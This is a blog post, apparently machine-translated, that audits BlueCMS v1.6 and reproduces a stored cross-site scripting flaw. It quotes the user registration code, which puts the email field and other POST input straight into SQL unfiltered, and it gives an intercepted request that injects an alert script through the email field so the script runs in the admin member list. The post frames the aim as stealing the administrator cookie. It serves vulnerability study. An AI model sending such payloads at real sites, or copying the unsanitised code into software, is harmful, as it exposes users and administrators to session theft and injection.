Code audit: xss vulnerability recurrence of bluecms user registration

Code audit: xss vulnerability recurrence of bluecms user registration

bluecms

BlueCMS is a solution focusing on the construction of local portal website. It is based on PHP+MySQL technology development, and all source codes are open.
The duplicate version is bluecmsv1.6, which you can download by yourself.

Code audit

This time, we don't need Seay to dig xss vulnerability. We audit xss vulnerability through key function test.
In the background - > member management - > member list, the administrator can view the member information. If the information here can insert xss code from the foreground, the administrator cookie can be stolen.

When you come to the front desk member registration office and try to register a user, you can see that the user name, email address and password are controllable.

Submit the registration and grab the package for specific analysis. You can see that the do? Reg method of user.php is used.

When you come to the code, you can see that the user name has a length limit, the mailbox is not filtered and directly inserted into the sql statement, so our xss code can be inserted into the mailbox.

elseif($act == 'do_reg'){
	$user_name 		=	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
	$pwd       		= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
	$pwd1 	   		= 	!empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
	$email     		= 	!empty($_POST['email']) ? trim($_POST['email']) : '';
	$safecode  		= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
	$from = !empty($from) ? base64_decode($from) : 'user.php';

	if(strlen($user_name) < 4 || strlen($user_name) > 16){
		showmsg('User name character length does not match');
	}
	if(strlen($pwd) < 6){
		showmsg('Password cannot be less than 6 characters');
	}
	if($pwd != $pwd1){
		showmsg('The two passwords are inconsistent');
	}
	if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
		showmsg('Verification code error');
	}
	if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
		showmsg('The user name already exists');
	}
	if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
		showmsg('The user name already exists');
	}
	$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
	if(!$db->query($sql)){
		showmsg('Sorry, there was an error in the registration');
	}else{
		$_SESSION['user_id'] = $db->insert_id();
		$_SESSION['user_name'] = $user_name;
		update_user_info($_SESSION['user_name']);
		setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
		if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
		{
		$uid = uc_user_register($user_name, $pwd, $email);
		if($uid <= 0)
		{
			if($uid == -1)
			{
				showmsg('Illegal user name!');
			}
			elseif($uid == -2)
			{
				showmsg('Contains words that are not allowed to be registered!');
			}
			elseif($uid == -3)
			{
				showmsg('The user name you specified '.$user_name.' Already exists, please use a different user name!');
			}
			elseif($uid == -4){
				showmsg('What you use Email Wrong format!');
			}
			elseif($uid == -5)
			{
				showmsg('What you use Email Registration is not allowed!');
			}
			else
			{
				showmsg('Registration failed!');
			}
		}
		else
		{
			$ucsynlogin = uc_user_synlogin($uid);
			echo $ucsynlogin;
		}
		}
		$_SESSION['last_reg'] = $timestamp;
		showmsg('Congratulations on your successful registration,Now it will turn...', $from);
	}
 }

Loophole reappearance

The front-end has js to verify the validity of the mailbox. Then we enter the correct email address and grab the package for modification.

referer=&user_name=xss123&pwd=123456&pwd1=123456&email=haha%40qq.com<script>alert(1)</script>&safecode=rc4d&from=&act=do_reg


You can see that the registration is successful. Log in to xss123 user and pop up the window directly.

Log in to the background as an administrator, view the member list, and pop up the window successfully. The xss code is inserted successfully.

205 original articles published, 31 praised, 10000 visitors+
Private letter follow

Tags: PHP SQL MySQL less

Posted on Mon, 16 Mar 2020 05:42:54 -0400 by ajna